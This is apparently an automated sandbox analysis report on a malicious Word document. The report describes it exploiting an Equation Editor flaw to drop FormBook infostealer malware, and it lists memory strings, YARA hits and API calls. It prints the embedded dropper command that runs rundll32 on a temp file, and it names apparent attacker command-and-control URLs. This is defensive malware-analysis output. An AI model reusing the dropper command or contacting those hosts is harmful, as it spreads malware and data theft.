              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://ocsp.entrust.net05
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: convert.exe, 0000000B.00000002.649184315.0000000005080000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648888514.0000000002DF6000.00000004.10000000.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.0000000003816000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.danceonwater.net/px.js?ch=1
              Source: convert.exe, 0000000B.00000002.649184315.0000000005080000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648888514.0000000002DF6000.00000004.10000000.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.0000000003816000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.danceonwater.net/px.js?ch=2
              Source: convert.exe, 0000000B.00000002.649184315.0000000005080000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648888514.0000000002DF6000.00000004.10000000.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.0000000003816000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.danceonwater.net/sk-logabpstatus.php?a=RXBFWi9PS1JhK2o0VE4rSFJRc2lNUXNGcGpJQlFMaUNXZ29mRW
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: xwizard.1.dr, ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drString found in binary or memory: http://www.entrust.net/rpa0
              Source: mVjlVtpvDsvJ.exe, 0000000C.00000002.648430732.0000000000950000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.maryneedskidneys.info
              Source: mVjlVtpvDsvJ.exe, 0000000C.00000002.648430732.0000000000950000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.maryneedskidneys.info/tqdg/
              Source: convert.exe, 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drString found in binary or memory: http://www.sqlite.org/copyright.html.
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: convert.exe, 0000000B.00000002.649184315.0000000005080000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648888514.0000000002F88000.00000004.10000000.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.00000000039A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://bf102.slafwi.cn/38.html
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: mVjlVtpvDsvJ.exe, 0000000C.00000002.648577644.0000000003816000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
              Source: convert.exe, 0000000B.00000003.541417922.00000000002C7000.00000004.00000020.00020000.00000000.sdmp, 2-4C93H.11.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: convert.exe, 0000000B.00000003.541747443.0000000005C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: rundll32.exe, 00000006.00000002.419513306.00000000002DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.diced.jp/~lizard581/cgi-bin/imageup/data/1424.jpg
              Source: 2-4C93H.11.drString found in binary or memory: https://www.google.com/favicon.ico
              Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
              Source: unknownHTTPS traffic detected: 153.121.40.91:443 -> 192.168.2.22:49161 version: TLS 1.2
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 9.2.ImagingDevices.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.648541156.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497403170.00000000001E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648550804.0000000000840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.648430732.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.553330249.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648308986.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497567649.0000000002200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
              Document contains OLE streams with names of living off the land binaries
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drStream path '_1792802952/Equation Native' : ...............\.[.............ZZCmD.exe /C rundll32 %tmp%\xwizard.,IEX A..C................................................................................................................
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drStream path '_1792802956/Equation Native' : ...............\.[.............ZZCmD.exe /C rundll32 %tmp%\xwizard.,IEX A..C................................................................................................................
              Office process drops PE file
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\xwizardJump to dropped file
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess Stats: CPU usage > 49%
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0042C563 NtClose,9_2_0042C563
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0040AB17 NtResumeThread,9_2_0040AB17
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008807AC NtCreateMutant,LdrInitializeThunk,9_2_008807AC
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087F9F0 NtClose,LdrInitializeThunk,9_2_0087F9F0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_0087FAE8
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_0087FB68
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_0087FDC0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008800C4 NtCreateFile,9_2_008800C4
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008810D0 NtOpenProcessToken,9_2_008810D0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00880048 NtProtectVirtualMemory,9_2_00880048
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00880060 NtQuerySection,9_2_00880060
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00880078 NtResumeThread,9_2_00880078
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008801D4 NtSetValueKey,9_2_008801D4
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0088010C NtOpenDirectoryObject,9_2_0088010C
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00881148 NtOpenThread,9_2_00881148
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087F8CC NtWaitForSingleObject,9_2_0087F8CC
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087F900 NtReadFile,9_2_0087F900
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00881930 NtSetContextThread,9_2_00881930
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087F938 NtWriteFile,9_2_0087F938
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FAB8 NtQueryValueKey,9_2_0087FAB8
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FAD0 NtAllocateVirtualMemory,9_2_0087FAD0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FA20 NtQueryInformationFile,9_2_0087FA20
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FA50 NtEnumerateValueKey,9_2_0087FA50
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FBB8 NtQueryInformationToken,9_2_0087FBB8
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FBE8 NtQueryVirtualMemory,9_2_0087FBE8
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FB50 NtCreateKey,9_2_0087FB50
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FC90 NtUnmapViewOfSection,9_2_0087FC90
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FC30 NtOpenProcess,9_2_0087FC30
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00880C40 NtGetContextThread,9_2_00880C40
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FC48 NtSetInformationFile,9_2_0087FC48
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FC60 NtMapViewOfSection,9_2_0087FC60
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00881D80 NtSuspendThread,9_2_00881D80
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FD8C NtDelayExecution,9_2_0087FD8C
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FD5C NtEnumerateKey,9_2_0087FD5C
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FEA0 NtReadVirtualMemory,9_2_0087FEA0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FED0 NtAdjustPrivilegesToken,9_2_0087FED0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FE24 NtWriteVirtualMemory,9_2_0087FE24
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FFB4 NtCreateSection,9_2_0087FFB4
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FFFC NtCreateProcessEx,9_2_0087FFFC
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0087FF34 NtQueueApcThread,9_2_0087FF34
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_004186C39_2_004186C3
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0041005A9_2_0041005A
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_004100639_2_00410063
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_004028909_2_00402890
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0041690E9_2_0041690E
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_004169139_2_00416913
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_004031E09_2_004031E0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0040E2FB9_2_0040E2FB
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_004102839_2_00410283
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0042EB739_2_0042EB73
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0040E3039_2_0040E303
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_004025409_2_00402540
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0088E0C69_2_0088E0C6
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008BD0059_2_008BD005
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008930409_2_00893040
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008A905A9_2_008A905A
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0090D06D9_2_0090D06D
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0088E2E99_2_0088E2E9
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_009312389_2_00931238
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_009363BF9_2_009363BF
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0088F3CF9_2_0088F3CF
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008B63DB9_2_008B63DB
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008923059_2_00892305
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008973539_2_00897353
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008DA37B9_2_008DA37B
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008A14899_2_008A1489
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008C54859_2_008C5485
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0091443E9_2_0091443E
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008CD47D9_2_008CD47D
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_009105E39_2_009105E3
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008AC5F09_2_008AC5F0
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0089351F9_2_0089351F
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008D65409_2_008D6540
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008946809_2_00894680
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0089E6C19_2_0089E6C1
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_009326229_2_00932622
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008DA6349_2_008DA634
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0091579A9_2_0091579A
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0089C7BC9_2_0089C7BC
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008C57C39_2_008C57C3
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0090F8C49_2_0090F8C4
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0092F8EE9_2_0092F8EE
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0089C85C9_2_0089C85C
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008B286D9_2_008B286D
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0093098E9_2_0093098E
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008929B29_2_008929B2
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008A69FE9_2_008A69FE
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_009159559_2_00915955
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0091394B9_2_0091394B
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00943A839_2_00943A83
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0093CBA49_2_0093CBA4
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0091DBDA9_2_0091DBDA
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00916BCB9_2_00916BCB
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0088FBD79_2_0088FBD7
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008B7B009_2_008B7B00
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0092FDDD9_2_0092FDDD
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008C0D3B9_2_008C0D3B
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0089CD5B9_2_0089CD5B
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008C2E2F9_2_008C2E2F
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008AEE4C9_2_008AEE4C
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0092CFB19_2_0092CFB1
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00902FDC9_2_00902FDC
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008A0F3F9_2_008A0F3F
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_008BDF7C9_2_008BDF7C
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_0460266610_2_04602666
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_0460442210_2_04604422
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_0460441910_2_04604419
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_0460ACCD10_2_0460ACCD
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_0460ACD210_2_0460ACD2
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_0460464210_2_04604642
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_046026C210_2_046026C2
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_046026BA10_2_046026BA
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_04622F3210_2_04622F32
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_0460CA5110_2_0460CA51
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E8F4D311_2_61E8F4D3
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E751E611_2_61E751E6
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E170A211_2_61E170A2
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E433A211_2_61E433A2
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2A31011_2_61E2A310
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E4855211_2_61E48552
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E214AF11_2_61E214AF
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E4041C11_2_61E4041C
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E4596B11_2_61E4596B
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E5286F11_2_61E5286F
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E1C80211_2_61E1C802
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E31A1F11_2_61E31A1F
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E25EFD11_2_61E25EFD
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E45ECF11_2_61E45ECF
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E3EE0611_2_61E3EE06
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 6710D91D77E1937DD5B46D96C0852042985DC78C4C51CE12D3E07A4CDB12C202
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\wcC8DC.tmp 22F72938B6ADEF7A0832E2856AD1F72A1C4400D0CE0DD9AECF87F68118FFE921
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: String function: 008D3F92 appears 132 times
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: String function: 008D373B appears 245 times
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: String function: 008FF970 appears 84 times
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: String function: 0088E2A8 appears 41 times
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: String function: 0088DF5C appears 123 times
              Source: sqlite3.dll.11.drStatic PE information: Number of sections : 18 > 10
              Source: wcC8DC.tmp.6.drStatic PE information: No import functions for PE file found
              Source: xwizard.1.drStatic PE information: No import functions for PE file found
              Source: C:\Windows\SysWOW64\convert.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
              Source: wcC8DC.tmp.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: wcC8DC.tmp.6.drStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOCX@14/19@8/7
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$RFQ.docxJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA2E3.tmpJump to behavior
              Source: ~WRD0000.tmp.1.drOLE indicator, Word Document stream: true
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drOLE document summary: title field not present or empty
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drOLE document summary: author field not present or empty
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drOLE document summary: edited time not present or 0
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
